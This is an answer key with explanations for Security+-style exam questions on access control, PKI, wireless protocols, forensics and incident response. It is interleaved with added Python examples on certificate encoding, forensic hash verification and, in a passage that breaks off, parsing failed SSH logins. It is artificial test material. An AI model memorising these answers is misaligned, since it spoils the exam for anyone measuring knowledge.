171. B. Role-based access control (RBAC) grants permissions based on the user's position within the organization. Mandatory access control (MAC) uses security classifications to grant permissions. Discretionary access control (DAC) allows data owners to set permissions. Attribute-based access control (ABAC) considers various attributes such as location, time, and computer, in addition to username and password.
172. B. Measured boot provides a form of boot attestation that records information about each component loaded during the boot process. This information can then be reported to a server for validation. Trusted boot validates each component against a known signature. Measured boot does not care about the time to boot up, nor does it update the system's Unified Extensible Firmware Interface (UEFI).
173. D. The key distribution center (KDC) issues tickets. The tickets are generated by the ticket-granting service (TGS), which is usually part of the KDC. The authentication service simply authenticates the user, X.509 certificates and certificate authorities are not part of Kerberos, and the ticket-granting service does generate the ticket, but the KDC issues it.
174. C. Although patching devices is important, the most effective way to protect devices from being attacked via administrative account brute forcing is to place the devices on a separate management virtual LAN (VLAN) and then control access to that VLAN. This will prevent most attackers from being able to connect to the devices' administrative interfaces. Disabling administrative access may not be possible, and even if it was, it would create significant problems when the devices needed to have changes made on them.
175. A. While mobile device management (MDM) and unified endpoint management (UEM) tools provide many capabilities, carrier unlock status normally needs to be checked with the carrier if you want to validate corporate-owned phones without manually checking each device.
176. A. Zero-trust environments typically have a more complex network due to increased segmentation to isolate systems and devices that have different security contexts. Zero-trust networks also require strong identity and access management, and they use application-aware firewalls extensively to preserve least privilege. Of course, logging and analysis of security events is necessary to ensure that issues are identified and responded to.
177. A. Digital certificates use the X.509 standard (or the PGP standard) and allow the user to digitally sign authentication requests. OAuth allows an end user's account information to be used by third-party services, without exposing the user's password. It does not use digital certificates or support digital signing. Kerberos in its standard form does not use digital certificates (the PKINIT extension adds them), nor does it support digital signing. Smart cards can contain digital certificates but don't necessarily have to have them.
178. C. SAML (Security Assertion Markup Language) is an Extensible Markup Language (XML) framework for creating and exchanging security information between partners online. The integrity of the user's session is the weak point in the SAML identity chain, so to mitigate this risk SAML systems need to use timed sessions and HTTPS (TLS). LDAP (Lightweight Directory Access Protocol) is a protocol that enables a user to locate individuals and other resources such as files and devices in a network. Terminal Access Controller Access Control System Plus (TACACS+) is a protocol that is used to control access into networks. TACACS+ provides authentication and authorization in addition to an accounting of access requests against a central database. Transitive trust is a two-way relationship that is automatically created between a parent and a child domain in a Microsoft Active Directory (AD) forest. It shares resources with its parent domain by default and enables an authenticated user to access resources in both the child and parent domains.
179. C. UEM, or unified endpoint management, manages desktops, laptops, mobile devices, printers, and other types of devices. Mobile device management (MDM) tools focus on mobile devices.
180. B. Host-based firewalls are the first step in most designs when protecting against network-borne threats. They can prevent unwanted traffic from entering or leaving the host, leaving less traffic for a host-based intrusion prevention system (HIPS) or other tools to analyze. Full-disk encryption (FDE) will not stop network-borne threats, and antivirus focuses on prevention of malware, not network threats like denial of service or exploitation of vulnerable services.
181. A. Security groups are a virtual firewall for instances, allowing rules to be applied to traffic between instances. Dynamic resource allocation is a concept that allows resources to be applied as they are needed, including scaling up and down infrastructure and systems on the fly. Virtual private cloud (VPC) endpoints are a way to connect to services inside of a cloud provider without an Internet gateway. Finally, instance awareness is a concept that means that tools know about the differences between instances, rather than treating each instance in a scaling group as the same. This can be important during incident response processes and security monitoring for scaled groups, where resources may all appear identical without instance awareness.
182. D. Although built-in update tools will handle the operating system, additional software installed on systems needs to be patched separately. Third-party software and firmware, including the Unified Extensible Firmware Interface (UEFI) or BIOS of the systems that are deployed in Derek's organization, will need regular updates. Many organizations adopt patch management platforms or system management platforms with patching capabilities to ensure that this occurs on a broader basis than just OS patches.
183. A. IDSs, or intrusion detection systems, can only detect unwanted and malicious traffic based on the detection rules and signatures that they have. They cannot stop traffic or modify it. An IPS, or intrusion prevention system, that is placed in line with network traffic can take action on that traffic. Thus, IDSs are often used when it is not acceptable to block network traffic, or when a tap or other network device is used to clone traffic for inspection.
184. C. Although insider threats are a concern, they're not any different for containers than any other system. Ensuring container host security, securing the management stack, and making sure that network traffic to and from containers is secure are all common container security concerns.
185. C. Network address translation (NAT) gateways allow internal IP addresses to be hidden from the outside, preventing direct connections to systems behind them. This effectively firewalls inbound traffic unless the gateway is set to pass traffic to an internal host when a specific IP, port, and protocol is used. They are not a firewall in the traditional sense, however, and do not specifically statefully block traffic by port and protocol, nor do they detect malicious traffic. Finally, NAT gateways are not used to send non-IP traffic out to IP networks.
186. C. Conditional access assesses specific conditions to make a determination about whether to allow an account to access a resource. The system may choose to allow access, to block access, or to apply additional controls based on the conditions that are present and the information that is available about the login.
187. B. If the system maintains a password history, that would prevent any user from reusing an old password. Password complexity and length are common security settings but would not prevent the behavior described. Multifactor authentication helps prevent brute-force attacks and reduces the potential impact of stolen passwords but would not help with this scenario.
188. D. Bridge Protocol Data Unit (BPDU) guard protects network infrastructure by preventing unknown devices from participating in spanning tree. That prevents a new switch added by a user from claiming to be the root bridge (in this case, Switch C), which would normally cause a topology change and for traffic to be sent to Switch X, an undesirable result. 802.11n is a wireless protocol, and the remaining options were made up for this question.
189. A. The net user command allows this control to be put in place (its /times: switch sets the hours during which an account may log on). Although you may not be familiar with the many net user options, you can take out unrealistic commands or commands with flaws in them. For example, here you could likely guess that -working-hours isn't a defined term. In the same way, login isn't a Windows command, but net commands are commonly used to control Windows systems.
190. A. Auditing and reviewing how users actually utilize their account permissions would be the best way to determine if there is any inappropriate use. A classic example would be a bank loan officer. By the nature of their job, they have access to loan documents. But they should not be accessing loan documents for loans they are not servicing. The issue in this case is not permissions, because the users require permission to access the data. The issue is how the users are using their permissions. Usage auditing and permissions auditing are both part of account maintenance, but auditing and review is a better answer. Finally, this is not a policy issue.
191. B. A scenario such as guest Wi-Fi access does not provide the logins with any access to corporate resources. The people logging in merely get to access the Internet. This poses very limited security risk to the corporate network and thus is often done with a common or shared account. Tech support personnel generally have significant access to corporate network resources. Although a student account is a relatively low access scenario, it is still important to know which specific student is logging on and accessing what resources. Any level of access to corporate resources should have its own individual login account.
192. B. Certificate chains list certificates and certificate authority (CA) certificates, allowing those who receive the certificate to validate that the certificates can be trusted. An invalid, or broken, chain means that the user or system that is checking the certificate chaining should not trust the system and certificate.
193. D. 802.1X is the IEEE standard for port-based network access control. This protocol is frequently used to authenticate devices. Challenge Handshake Authentication Protocol (CHAP) is an authentication protocol but not the best choice for device authentication. Kerberos is an authentication protocol but not the best choice for device authentication. 802.11i is the Wi-Fi security standard and is fully implemented in WPA2 and WPA3. It is not a device authentication procedure.
194. A. WPA2 uses the AES-based CCMP, or Counter Mode with Cipher Block Chaining Message Authentication Code (CBC-MAC) Protocol, to encapsulate traffic, providing confidentiality and integrity. WPA3 also uses CCMP as the minimum acceptable encryption in WPA3-Personal mode. WEP, infrared, and Bluetooth do not use CCMP.
195. A. Simple Network Management Protocol (SNMP) would give an attacker a great deal of information about your network. SNMP should not be exposed to unprotected networks, SNMPv3 should be implemented, and SNMP security best practices should be followed. Both POP3 and IMAP are email access protocols, and Dynamic Host Configuration Protocol (DHCP) is used to hand out dynamic IP addresses.
196. C. Accounts should lock out after a small number of login attempts. Three is a common number of attempts before the account is locked out. This prevents someone from just attempting random guesses. Password aging will force users to change their passwords but won't affect password guessing. Longer passwords would be harder to guess, but this option is not as effective as account lockout policies. Account usage auditing won't have any effect on this issue.
197. A. Security Assertion Markup Language (SAML) is an XML-based, open standard format for exchanging authentication and authorization data between parties. OAuth allows an end user's account information to be used by third-party services, without exposing the user's password. RADIUS is an authentication, authorization, and accounting (AAA) protocol for remote access and is not XML-based. New Technology LAN Manager (NTLM) is not XML-based.
198. A. Challenge Handshake Authentication Protocol (CHAP) was designed specifically for this purpose. It periodically reauthenticates the client during the session, thus helping prevent session hijacking. Neither Password Authentication Protocol (PAP) nor TACACS+ prevents session hijacking, and RADIUS is an authentication, authorization, and accounting protocol for remote access that does not repeat the challenge during an established session.
199. C. IPsec virtual private networks (VPNs) can make a remote location appear as though it is connected to your local network. Since Greg needs to rely on a streaming security camera, an always-on IPsec VPN is the best solution listed. TLS (SSL) VPNs are primarily used for specific applications, typically focusing on web applications.
200. B. The Opal storage specification defines how to protect confidentiality for stored user data and how storage devices from different storage device manufacturers can work together. Opal does not specify details or processes for licenses, accounts, and libraries, or degaussers.
201. B. UEFI Secure Boot checks every binary that is loaded during boot to make sure its signature is valid against a certificate in the firmware's signature database, or that its hash is explicitly allowlisted there. It does not protect against worms that might attack those binaries, nor does it directly check the system BIOS version.
202. C. OpenID Connect works with the OAuth 2.0 protocol and supports multiple clients, including web-based and mobile clients. OpenID Connect also supports REST. Shibboleth is a middleware solution for authentication and identity management that uses SAML (Security Assertion Markup Language) and works over the Internet. RADIUS is an authentication, authorization, and accounting protocol for remote access. OAuth allows an end user's account information to be used by third-party services, without exposing the user's password.
203. D. Anomaly-based detection systems build a behavioral baseline for networks and then assess differences from those baselines. They may use heuristic capabilities on top of those, but the question specifically asks about baselined operations, pointing to an anomaly-based system. Heuristic-based detections look for behaviors that are typically malicious, and signature-based or hash-based detections look for known malicious tools or files.
204. B. A Trusted Platform Module, or TPM, is used as the foundation for a hardware root of trust for modern PCs. The TPM may provide a cryptographic key; a PUF, or physically unclonable function; or a serial number that is unique to the device. The CPU and hard drive are not used for this function, and HSMs, or hardware security modules, are used for public key infrastructure (PKI) and cryptographic purposes but not as a hardware root of trust for PCs.
205. C. Next-generation firewalls typically build in advanced capabilities like URL filtering, blacklisting, and other application-layer capabilities beyond simple packet filtering or stateful packet inspection.
206. D. Mobile application management (MAM) tools are specifically designed for this purpose, and they allow applications to be delivered to, removed from, and managed on mobile devices. MOM is the Microsoft Operations Manager, a systems management tool that Microsoft has replaced with Operations Manager in current use. MLM often means multilevel marketing, or pyramid schemes, not a security term. MIM is not a security term.
207. A. Cloud applications have many of the same concerns as on-premises applications, but compromise of the system running the application due to local access is a far less likely scenario. Cloud application vendors are more likely to operate in secure data centers with limited or no access to the servers except for authorized personnel, greatly reducing the likelihood of this type of security issue.
208. D. The most critical part of a certificate authority (CA) is its root certificate and the private key behind it, and ensuring that the root key is never exposed is critical to the ongoing operation of that CA. Thus, root CAs are often maintained as offline CAs, making it far harder for an attacker to compromise the system and gain access to the root key. In practice, compromised CAs may lose the trust of organizations around the world and be unable to continue to do business.
209. C. Split-tunnel VPNs send only traffic destined for the remote network over the VPN, with all other traffic going directly out the user's local network connection. This reduces overall traffic sent through the VPN but means that the other traffic cannot be monitored and secured via the VPN. Half-pipe is not a security term, and split horizon is most often used to describe DNS where an internal and external DNS view may be different.
210. A. Loop protection looks for exactly this type of issue. Loop protection sends packets that include a PDU, or protocol data unit. These are detected by other network devices and allow the network devices to shut down ports from which they receive those packets. The remaining options were made up for this question.
211. C. Over-the-air (OTA) updates are used by cellular carriers as well as phone manufacturers to provide firmware updates and updated phone configuration data. Mobile device management (MDM) tools can be used to monitor for the current firmware version and phone settings and will allow Charles to determine if the phones that his staff use are updated to ensure security. A network access control (NAC) agent might capture some of this data but only for network-connected phones, which will not cover off-site phones, those with Wi-Fi turned off, or remote devices. OTA is not specifically a way to update encryption keys, although firmware or settings might include them. OTA is not sent by the phones themselves.
212. C. Open source firewalls typically do not have the same level of vendor support and maintenance that commercial firewalls do. That means you don't have a vendor to turn to if something goes wrong, and you will be reliant on a support community for patches and updates. Open source firewalls are typically less expensive, their open source nature means that the code can be validated by anybody who cares to examine it, and they can be acquired as quickly as they can be downloaded.
213. C. WPA3-Personal replaced PSK, or preshared keys, with SAE, or Simultaneous Authentication of Equals. SAE helps to prevent brute-force attacks against keys by making attackers interact with the network before each authentication attempt, so a captured handshake cannot be attacked offline; this slows down brute-force attacks. WPA3 also includes a 192-bit security mode (in WPA3-Enterprise). It does not replace 64-bit encryption with 128-bit encryption, add per-channel security, or add distributed denial-of-service (DDoS) monitoring and prevention.
214. B. Security Enhanced Linux (SELinux) allows mandatory access control for Linux-based systems, and SEAndroid is an Android implementation of SELinux. That means that Isaac can use SEAndroid to accomplish his goals. Android does use a registry, but there is no MAC mode. MACDroid was made up for this question, and single-user mode does not make Android a MAC-based system.
215. B. The system described is a privileged access management (PAM) system. PAM systems are used to manage and control privileged accounts securely. MAC is an access control scheme that enforces access at the OS level. FDE is full-disk encryption, and TLS is Transport Layer Security.
216. A. Using a mobile device management (MDM) tool that allows control of the devices would allow Alaina to lock out the cameras, preventing staff members from using the Android tablets to take pictures. She would still need to ensure that her staff did not bring their own camera-equipped devices into the facility. DLP is data loss prevention, OPAL is an encryption standard for drives, and MMC has a number of meanings, including multimedia cards and Microsoft Management Console snap-ins for Windows systems, none of which would provide the control she needs.
217. C. A unified endpoint management (UEM) tool can manage desktops, laptops, mobile devices, printers, and other devices. UEM tools often use applications deployed to mobile devices to configure and manage them, and Olivia's best option from this list is a UEM tool. A CASB is a cloud access security broker and is not used to manage mobile devices, and the other options require massive amounts of manual work and are unlikely to succeed, or users will simply change settings when it is convenient to them.
218. C. Next-generation (NG) secure web gateways (SWG) add additional features beyond those found in cloud access security brokers and next-generation firewalls. While features can vary, they may include web filtering, TLS decryption to allow traffic analysis and advanced threat protection, cloud access security broker (CASB) features, data loss prevention (DLP), and other advanced capabilities. This type of solution is a relatively new one, and the market is changing quickly.
219. C. Access policies are built using information and attributes about access requests. If the policy requirements are met, actions like allowing or denying access, or requiring additional authentication steps, can be performed. Geolocation and time-based logins focus on a single information component, and account auditing is used to review permissions for accounts, not to perform this type of validation or policy-based control.
220. B. Numeric (octal) representations of file permissions are commonly used instead of rwx notation with chmod. Each digit is the sum of read (4), write (2), and execute (1), so a 7 sets full permissions. The first digit sets the owner's (user's) rights, the second the group's, and the third everyone else's, meaning that here the user will be granted full access to the file.
221. B. Certificate pinning associates a known certificate with a host and then compares that known certificate with the certificate that is presented. This can help prevent man-in-the-middle attacks but can fail if the certificate is updated and the pinned certificate isn't. A CRL, or certificate revocation list, would show whether the certificate has been revoked, but it would not show if it was changed. Patrick will not have access to the remote server's private key unless he happens to be the administrator.
222. C. Privacy Enhanced Mail (PEM) is the most common format issued by certificate authorities. Distinguished Encoding Rules (DER) is the binary ASN.1 encoding of a certificate; a PEM file is that same DER data, Base64-encoded between BEGIN and END header lines. PKCS#7 or P7B format is usually Base64 ASCII and holds certificates and chains but no private keys, and PKCS#12, or PFX, format is a binary format used to store server certificates, intermediate certificates, and private keys in a single file.
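The PEM/DER relationship in the answer above, as an added example (not code from the book): the functions detect which encoding a blob uses, unwrap a PEM block to its DER bytes, wrap DER back into PEM, and sanity-check the outer ASN.1 SEQUENCE length before the bytes go to a real X.509 parser. SAMPLE_DER is a constructed minimal SEQUENCE rather than a real certificate so the block runs offline; the same functions accept a real certificate's bytes.

```python
"""Detect and convert between PEM and DER encodings of an X.509 object.

Added example (not from the book). SAMPLE_DER is a constructed minimal ASN.1
SEQUENCE, not a real certificate, so the example runs offline; the same
functions work on a real certificate's bytes.
"""
import base64
import re
import textwrap

# A PEM block: a label line, a Base64 body, and a matching END line.
PEM_BLOCK = re.compile(
    r"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.DOTALL)

# Constructed DER: SEQUENCE { INTEGER 1, UTF8String "constructed" }.
SAMPLE_DER = bytes.fromhex("3010" "020101" "0c0b") + b"constructed"


def detect_format(data):
    """Return 'PEM', 'DER', or 'unknown'. DER certificates, CSRs, and PKCS#7/#12
    containers all start with an ASN.1 SEQUENCE tag, byte 0x30."""
    if data.lstrip().startswith(b"-----BEGIN "):
        return "PEM"
    if data[:1] == b"\x30":
        return "DER"
    return "unknown"


def pem_to_der(pem):
    """Return (label, der_bytes) for the first PEM block, e.g. ('CERTIFICATE', b'0...')."""
    match = PEM_BLOCK.search(pem.decode("ascii"))
    if not match:
        raise ValueError("no PEM block found")
    label, body = match.group(1), match.group(2)
    return label, base64.b64decode("".join(body.split()), validate=True)


def der_to_pem(der, label="CERTIFICATE"):
    """Wrap DER bytes as a PEM block with 64-character Base64 lines."""
    body = textwrap.wrap(base64.b64encode(der).decode("ascii"), 64)
    lines = [f"-----BEGIN {label}-----", *body, f"-----END {label}-----"]
    return ("\n".join(lines) + "\n").encode("ascii")


def der_outer_length(der):
    """Parse the outer SEQUENCE header and return its declared content length,
    refusing data whose length byte(s) do not match the bytes actually present
    (a cheap sanity check before handing the blob to a real X.509 parser)."""
    if der[:1] != b"\x30":
        raise ValueError("not a DER SEQUENCE")
    first = der[1]
    if first < 0x80:                      # short form: one length byte
        length, header = first, 2
    else:                                 # long form: 0x8N, then N length bytes
        n = first & 0x7F
        length, header = int.from_bytes(der[2:2 + n], "big"), 2 + n
    if header + length != len(der):
        raise ValueError(f"declared {length} content bytes, found {len(der) - header}")
    return length


if __name__ == "__main__":
    pem = der_to_pem(SAMPLE_DER)
    print(detect_format(SAMPLE_DER), detect_format(pem))
    print(pem.decode("ascii"))
    print(pem_to_der(pem) == ("CERTIFICATE", SAMPLE_DER), der_outer_length(SAMPLE_DER))
```

The Base64 body is what makes a PEM file copy-paste safe; the DER bytes underneath are what a parser, a pinning check, or a fingerprint actually operates on, which is why a SHA-256 fingerprint is computed over the DER, not over the PEM text.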
223. C. Michelle's only option is to remove the certificate from the list of trusted certificates on every machine that trusted it. This can be time-consuming and error prone, and it's one reason self-signed certificates are avoided in production at many organizations.
224. D. Changing the IP addresses associated with a domain to an arbitrary value could cause routing or other problems. That means that changing the IP address would not be a chosen method of validating a domain. The remaining options are legitimate and normal means of validation for certificates.
225. A. SNMPv3 adds the ability to authenticate users and groups and then encrypt messages, providing message integrity and confidentiality. It does not have SQL injection prevention built in, but it also isn't a protocol where SQL injection will typically be a concern.
226. A. This diagram shows a reverse proxy. A reverse proxy takes connections from the outside world and sends them to an internal server. A forward proxy takes internal connections and sends them to external servers. Round-robin and next-generation proxies are not types of proxies, although round-robin is a form of load balancing.
Chapter 4: Operations and Incident Response

1. A. Mila should select a hash, because a cryptographic hash is designed so that finding two inputs that produce the same output is computationally infeasible. A simple checksum (such as a CRC or an additive sum) only detects accidental corruption, so multiple files could easily share the same checksum value, whereas a cryptographic hashing algorithm will in practice be unique for each file that it is run against.
2. A. Allowlists are lists of approved software. Software can only be installed if it is on an allowlist. Denylists block specific applications, but they cannot account for every possible malicious application. Access control lists (ACLs) determine who can access a resource. A host intrusion detection system (HIDS) does not prevent software from being installed.
3. C. Correlation dashboards are used to aggregate events and to seek out connections. In some cases, this is done with advanced analytic algorithms, including artificial intelligence (AI) and machine learning (ML). A network intrusion detection system (NIDS) would be helpful but will not (by itself) necessarily correlate events. A public key infrastructure (PKI) handles certificates, not correlation and visibility of security events. Trend dashboards would show how things are going and which way statistics and information are moving.
4. D. Using tcpdump with the -i flag to set the interface, followed by a capture filter expression in which tcp selects the protocol and port selects the port, will capture exactly the traffic Emily needs to capture. Port 443 is the default HTTPS port. There is no -proto flag for tcpdump.
5. A. Tabletop exercises are used to talk through a process. Unlike walk-throughs, which focus on step-by-step review of an incident, Mila will focus more on how her team responds and on learning from those answers. A tabletop exercise can involve gaming out a situation. A simulation actually emulates an event or incident, either on a small or a large scale. Drills are not defined as part of the Security+ exam outline.
6. A. Backups are considered to be the least volatile type of storage since they change at a much slower pace and, in fact, may be intentionally retained for long periods of time without changing. In this list, CPU cache will change the most frequently, then RAM, then local disk contents.
7. C. Incident responders know that scan results can show vulnerable systems and services, providing clues about how attackers may have obtained access to systems. The scans will not show the programs the attackers used but may show services that they have enabled or changed. The scans will show the versions of software installed before the attack, but that information is only useful if the attackers either upgraded or changed the software or the software was vulnerable, making this a less accurate and useful answer. Finally, the scans may show where network security devices are, but that information should be available to the incident response team without trying to figure it out from scans.
8. C. After eradication of the issue has been completed, recovery can begin. Recovery can include restoration of services and a return to normal operations.
9. C. The -p flag adds a persistent route when combined with the route ADD command. Persistent routes will remain in the routing table between boots. By default, manually added routes are cleared at each boot. An attacker may choose to use this to help with an on-path (man-in-the-middle) attack.
10. D. Of the options provided, only theHarvester is an open source intelligence tool. curl is a tool used to transfer data, hping is a tool that is frequently used to build custom packets and to perform packet analyzer functions, and netcat is a utility that allows you to read and write to network connections, making it a broadly used tool for pentesters and attackers who need to transfer data using a small, capable utility.
11. C. The MITRE ATT&CK framework focuses on techniques and tactics and does not focus on a specific order of operations like the Cyber Kill Chain does. It also covers a broader range of techniques and adversaries than the Diamond Model does and is broadly implemented in many existing tools. The CVSS standard is a vulnerability scoring system and is not a useful framework for analyzing malware and attacks.
12. D. To properly preserve the system, Ted needs to ensure that it does not change. Turning the system off will cause anything in memory to be lost, which may be needed for the investigation. Removing the drive while a system is running can cause data to be lost. Instead, live imaging the machine and its memory may be required. Allowing users to continue to use a machine will result in changes, which can also damage Ted's ability to perform a forensic investigation.
13. D. Containment efforts are used to limit the spread or impact of an incident. Containment may focus on keeping systems or services online to ensure that organizations can continue to function until other options for business continuity can be implemented. Segmentation moves systems or services into different security zones, and isolation removes them from all contact or puts them in small groups that are removed from the rest of the organization and systems that are not impacted.
14. D. Windows does not log network traffic at a level of granularity that will show if a file has been uploaded. Basic traffic statistics can be captured, but without additional sensors and information gathering capabilities, Jessica will not be able to determine if files are sent from a Windows system.
15. C. The chain of custody in forensic activities tracks who has a device, data, or other forensic artifact at any time, when transfers occur, who performed analysis, and where the item, system, or device goes when the forensic process is done. Evidence logs may be maintained by law enforcement to track evidence that is gathered. Paper trail and digital footprint are not technical terms used for digital forensics.
16. A. Of the listed tools, only nmap is a port scanner, and thus it is the tool that will provide the required information. route is a command-line tool to view and add network traffic routes. hping is a packet generator and analyzer, and netstat is a command-line tool that shows network connections, interface statistics, and other useful information about a system's network usage.
17. B. The -c flag for grep counts the number of lines that match a given string in a file (a line that contains the string more than once still counts once). The -n flag shows the matched lines with their line numbers. Even if you're not sure about which flag is which, the syntax should help on a question like this. When using grep, the pattern comes before the filename, allowing you to rule out two of the options right away.
18. B. Stakeholder management involves working with stakeholders, or those who have an interest in the event or impacted systems or services. COOP, or Continuity of Operations Planning, is a U.S. federal government effort to ensure that federal agencies have continuity plans. PAM is privileged account management. Stakeholder management involves more than just communications, although communications is an important part of it.
19. D. The most common reason for a one-hour time offset between two systems in the same location is a faulty time zone setting creating a time offset between the systems.
20. C. DNS data is frequently logged to help identify compromised systems or systems that have visited known phishing sites. DNS logs can be used along with IP reputation and known bad hostname lists to identify issues like these. DNS data is not commonly used to identify network scans and cannot capture them. Domain transfers are not attacks, although they are information gathering and will show in the logs. DNS does not capture information about logins.
21. D. Even if you're not deeply familiar with the openssl command-line utility, you should know that its key and certificate generation commands take a key length in bits and that bit lengths like 1024, 2048, and 4096 are common. These key lengths are not commonly communicated in bytes, and certificates are unlikely to last for multiple decades, although a certificate authority (CA) root certificate can last for a long time.
22. B. By default, the tail command shows the last 10 lines of a file, and using the -f flag follows changes in the file. head shows the top of a file, and foot and follow were made up for this question.
23. B. Although firmware acquisition is a less commonly used technique, firmware is typically stored in a chip on a system board rather than on disk. Henry is most likely to succeed if he retrieves the running firmware from memory. A serial connection may work but would typically require rebooting the system.
24. B. Network flows using NetFlow or sFlow would provide the information that Eric wants, with details of how much traffic was used, when, and where traffic was directed. A firewall or data loss prevention (DLP) would not show the bandwidth detail, although a firewall may show the connection information for events. Packet flow was made up for this question and is not a technology used for this purpose.
25. D. Hashing using MD5 or SHA-1 is commonly used to validate that a forensic image matches the original drive; because both algorithms have known collision attacks, many tools now also record a SHA-256 hash, and reporting more than one algorithm is good practice. Many forensic duplicators automatically generate a hash of both drives when they complete the imaging process to ensure that there is a documentation chain for the forensic artifacts. A third image may be useful but does not validate this. Directory listings do not prove that drives match, and photos, though useful to document the drives and serial numbers, do not validate the contents of the drives.
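An added example (not code from the book) covering both question 1 and question 25 above: it shows two different byte strings that share a naive checksum but not a SHA-256 digest, which is why a checksum cannot stand in for a hash, and it verifies a constructed "image" against its "source drive" with several algorithms computed in one chunked pass, the way a forensic duplicator records MD5 and SHA-256 together. The drive and image contents, the one-bit corruption, and the 4 KiB chunk size are constructed assumptions.

```python
"""Why a cryptographic hash, not a checksum, verifies a forensic image.

Added example (not from the book) for questions 1 and 25. All data is
constructed in memory; no disk is read.
"""
import hashlib

# Constructed inputs: the same bytes in a different order.
FILE_A = b"attack at dawn"
FILE_B = b"dawn at attack"

# Constructed "drive" and "image": 10 KiB of repeating bytes, plus a copy with one bit flipped.
SOURCE_DRIVE = bytes(range(256)) * 40
GOOD_IMAGE = bytes(SOURCE_DRIVE)
BAD_IMAGE = SOURCE_DRIVE[:5000] + bytes([SOURCE_DRIVE[5000] ^ 0x01]) + SOURCE_DRIVE[5001:]


def additive_checksum(data):
    """A naive checksum: sum of the bytes modulo 2**16. It is order-insensitive,
    so many different inputs collide; it only catches accidental corruption."""
    return sum(data) % 65536


def hash_stream(data, algorithms=("md5", "sha1", "sha256"), chunk_size=4096):
    """Hash data in fixed-size chunks, updating every requested algorithm on a
    single pass, as a tool imaging a multi-gigabyte drive would."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for offset in range(0, len(data), chunk_size):
        chunk = data[offset:offset + chunk_size]
        for hasher in hashers.values():
            hasher.update(chunk)
    return {name: hasher.hexdigest() for name, hasher in hashers.items()}


def verify_image(source, image, algorithms=("md5", "sha256")):
    """Compare source and image digests per algorithm: {'md5': True, 'sha256': True}.
    Record more than one algorithm so a collision in one (MD5 and SHA-1 both
    have known collision attacks) cannot hide a tampered image."""
    expected = hash_stream(source, algorithms)
    actual = hash_stream(image, algorithms)
    return {name: expected[name] == actual[name] for name in algorithms}


def checksum_collides_but_hash_differs(a, b):
    """True when two distinct inputs share the naive checksum yet have different SHA-256 digests."""
    return (a != b
            and additive_checksum(a) == additive_checksum(b)
            and hashlib.sha256(a).hexdigest() != hashlib.sha256(b).hexdigest())


if __name__ == "__main__":
    print("checksum collision, hash differs:", checksum_collides_but_hash_differs(FILE_A, FILE_B))
    print("good image:", verify_image(SOURCE_DRIVE, GOOD_IMAGE))
    print("bad image: ", verify_image(SOURCE_DRIVE, BAD_IMAGE))
```

The single-bit change in BAD_IMAGE flips every digest, while the additive checksum of FILE_A and FILE_B is identical even though the files differ; the chunked loop gives the same digest regardless of chunk size, so the verifier can stream a large image without loading it into memory.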
26. B. Nessus is a popular vulnerability scanning tool. It is not a fuzzer, web application firewall (WAF), or protocol analyzer.
27. A. Of the options listed, the only requirement for admissibility is that the evidence must be relevant. Evidence must also be authenticated, meaning that it needs to be genuine.
28. D. The cost to the organization is not typically a part of communications planning. Since incidents can have a broad range of costs, and since exposing those costs can cause worry or a loss of customer confidence in the worst case, the costs of the incident are relatively rarely exposed as part of the incident response process. Communications with customers and employees are critical, and having different communication plans for different event severities helps ensure that appropriate communications occur.
29. B. The cat command without an angle bracket to redirect it will simply display the contents of the files listed. Thus, this command will display file1.txt, and then file2.txt. If Rick had inserted > between the two files, it would have appended file1.txt to file2.txt.
30. D. CentOS and Red Hat both store authentication log information in /var/log/secure instead of /var/log/auth.log used by Debian and Ubuntu systems. Knowing the differences between the major distributions can help speed up your forensic and incident investigations, and consistency is one of the reasons that organizations often select a single Linux distribution for their infrastructure whenever it is possible to do so.
31. B. Web page titles, as well as headers like meta tags, are examples of metadata about a page and are frequently used to gather information about web pages and websites. Headers are used as part of a page's design and typically describe the bar at the top of the page used for site navigation. Summary and hidden data are not technical terms used to describe web page components.
32. C. Cuckoo, or Cuckoo Sandbox, is a malware analysis sandbox that will safely run malware and then analyze and report on its behavior. strings is a command-line tool that retrieves strings from binary data. scanless is a tool described as a port scraper, which retrieves port information without running a port scan by using websites and services to run the scan for you. Sn1per is a pentest framework.
33. C. Although Autopsy, strings, and grep can all be used to retrieve information from files, exiftool is the only purpose-built file metadata retrieval tool listed.
34. B. FTK Imager is a free tool that can image both systems and memory, allowing Isaac to capture the information he wants. Although dd is useful for capturing disks, other tools are typically used for memory dumps, and though dd can be used on a Windows system, FTK Imager is a more likely choice. Autopsy is a forensic analysis tool and does not provide its own imaging tools. WinDump is a Windows version of tcpdump, a protocol analyzer.
35. B. When artifacts are acquired as part of an investigation, they should be logged and documented as part of the evidence related to the investigation. Artifacts could include a piece of paper with passwords on it, tools or technology related to an exploit or attack, smart cards, or any other element of an investigation.
36. A. The MX records for a domain list its email servers. Gary can use nslookup to query Domain Name System (DNS) for the MX servers using the command nslookup -query=mx example.com to look up example.com's email server. ping does not support MX server lookups, and both smtp and email are not command-line tools.
37. B. Wireshark can be used to capture and analyze live Session Initiation Protocol (SIP) traffic on a network. Analysts should keep in mind the fact that SIP traffic may be encrypted on their network and that they may need to take additional steps to fully view the content of SIP packets. Log files can provide information about SIP sessions and events and are useful for analysis after the fact, but they won't provide the same detail about live SIP traffic. Nessus is a vulnerability scanner, and SIPper was made up for this question.
38. A. Although all of the tools listed can perform a port scan and identify open ports, netcat is the only one that does not also integrate automated service identification.
39. D. Forensic reports should include appropriate technical detail. Analysis of a system does not include a picture of the person from whom the system was acquired.
40. A. This question tests your knowledge of both the common Linux logs and basic format information for the auth.log file. Greg could use grep to search for "Failed password" in the auth.log file found in /var/log on many Linux systems. There is not a common log file named bruteforce.log; tail and head are not useful for searching through the file, only for showing a set number of lines; and /etc/ is not the normal location for the auth.log file.
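The "Failed password" search from question 40 (and the /var/log/secure equivalent from question 30) done as detection logic rather than a one-off grep: the example below is added here and is not from the book; the log lines are constructed samples in the sshd auth.log format, and the function names and the threshold of three failures are my own choices.

```python
import re
from collections import Counter

# Constructed sample lines in the Debian/Ubuntu /var/log/auth.log format
# (not taken from any real system). On CentOS/Red Hat the same lines would
# live in /var/log/secure, and this parser works unchanged on them.
SAMPLE_AUTH_LOG = """\
Mar  3 09:12:01 web01 sshd[2211]: Accepted password for alice from 10.0.0.5 port 51022 ssh2
Mar  3 09:15:44 web01 sshd[2290]: Failed password for root from 203.0.113.7 port 40122 ssh2
Mar  3 09:15:46 web01 sshd[2290]: Failed password for root from 203.0.113.7 port 40122 ssh2
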